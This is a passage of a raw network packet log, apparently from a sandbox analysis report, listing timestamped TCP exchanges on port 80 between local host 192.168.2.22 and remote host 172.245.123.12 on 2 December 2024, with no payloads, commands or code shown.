                                                            Dec 2, 2024 07:28:57.300961018 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.301013947 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.309286118 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.309338093 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.309403896 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.309443951 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.317719936 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.317766905 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.317812920 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.317851067 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.326107025 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.326150894 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.326208115 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.326247931 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.334546089 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.334589958 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.334603071 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.334642887 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.342957973 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.342998981 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.343055010 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.343095064 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.351392984 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.351404905 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.351438046 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.351458073 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.481966972 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.482053041 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.482112885 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.482145071 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.486161947 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.486211061 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.486291885 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.486356974 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.494534016 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.494580984 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.494616985 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.494652987 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.502882004 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.502923965 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.502991915 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.503281116 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.511332989 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.511384010 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.511454105 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.511570930 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.519763947 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.519952059 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.519952059 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.519988060 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.528182983 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.528306007 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.528342009 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.536650896 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.536695957 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.537332058 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.537373066 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.543294907 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.543343067 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.543350935 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.543385983 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.549973965 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.550052881 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.550108910 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.556631088 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.556704044 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.556749105 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.556793928 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.563332081 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.563399076 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.563453913 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.570055962 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.570166111 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.570219040 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.576716900 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.576765060 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.576790094 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.576900005 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.583342075 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.583412886 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.583453894 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.583492041 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.590065956 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.590112925 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.590142012 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.590177059 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.596771002 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.596790075 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.596853971 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.603403091 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.603491068 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.603548050 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.610095024 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.610255957 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.610284090 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.610302925 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.616767883 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.616880894 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.616939068 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.623388052 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.623625994 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.692486048 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.692600012 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.692641020 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.692662954 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.695429087 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.695475101 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.695548058 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.695615053 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.701365948 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.701410055 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.701432943 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.701473951 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.707289934 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.707329035 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.707335949 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.707360029 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.713129044 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.713182926 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.713208914 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.713252068 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.718955994 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.719012976 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.719077110 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.719125032 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.724879980 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.724925995 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.724968910 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.725003958 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.730726957 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.730777979 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.730786085 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.730824947 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.736619949 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.736661911 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.736686945 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.736730099 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.741646051 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.741691113 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.741744995 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.741780043 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.746340990 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.746383905 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.746416092 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.746459961 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.751061916 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.751111984 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.751210928 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.751256943 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.753521919 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.753568888 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.753580093 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.753612041 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.756037951 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.756083965 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.756161928 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.756212950 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.758507967 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.758553982 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.758565903 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.758603096 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.760993958 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.761034966 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.761115074 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.761174917 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.763484001 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.763528109 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.763582945 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.763622999 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.765959024 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.766000986 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.766081095 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.766151905 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.768472910 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.768513918 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.768556118 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.768594980 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.770922899 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.770962954 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.771080971 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.771116018 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.773416042 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.773458004 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.773544073 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.773578882 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.775891066 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.775933981 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.775994062 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.776063919 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.778518915 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.778558969 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.778582096 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.778620005 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.780874968 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.780920029 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.781014919 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.781054974 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:57.783341885 CET8049166172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:28:57.784310102 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:28:59.899717093 CET4916680192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:02.184155941 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:02.304313898 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:02.304378033 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:02.304585934 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:02.424524069 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.464901924 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.464960098 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.464971066 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.464987040 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.464998960 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.465055943 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.465055943 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.465055943 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.465055943 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.465123892 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.465176105 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.465209007 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.465223074 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.465234041 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.465245008 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.465246916 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.465265989 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.465276003 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.467724085 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.585176945 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.585189104 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.585393906 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.589188099 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.589236975 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.666217089 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.666238070 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.666296959 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.668593884 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.668642998 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.668740988 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.668787003 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.677011013 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.677073002 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.677076101 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.677120924 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.685419083 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.685472965 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.685535908 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.685579062 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.693821907 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.693885088 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.693923950 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.693972111 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.702227116 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.702275038 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.702308893 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.702351093 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.710654020 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.710707903 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.710764885 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.710813999 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.719039917 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.719089985 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.719142914 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.719186068 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.727418900 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.727463007 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.727511883 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.727555037 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.735069036 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.735116005 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.735133886 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.735179901 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.742767096 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.742826939 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.742877960 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.742914915 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.750334978 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.750416994 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.867748022 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.867804050 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.867841959 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.867878914 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.870332003 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.870378017 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.870434999 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.870472908 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.875598907 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.875638962 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.875757933 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.875803947 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.880841017 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.880881071 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.880943060 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.880983114 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.886127949 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.886168003 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.886312962 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.886357069 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.891341925 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.891381025 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.891439915 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.891479015 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.896579981 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.896621943 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.896650076 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.896687984 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.901838064 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.901878119 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.901912928 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.901949883 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.907088041 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.907141924 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.907206059 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.907244921 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.912316084 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.912370920 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.912420988 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.912461996 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.917606115 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.917644978 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.917707920 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.917747974 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.922832966 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.922873020 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.922936916 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.922980070 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.928148031 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.928191900 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.928241968 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.928277016 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.933295965 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.933339119 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.933398008 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.933440924 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.938551903 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.938594103 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.938653946 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.938694954 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.944108009 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.944127083 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.944147110 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.944158077 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.949120045 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:03.949129105 CET8049167172.245.123.12192.168.2.22
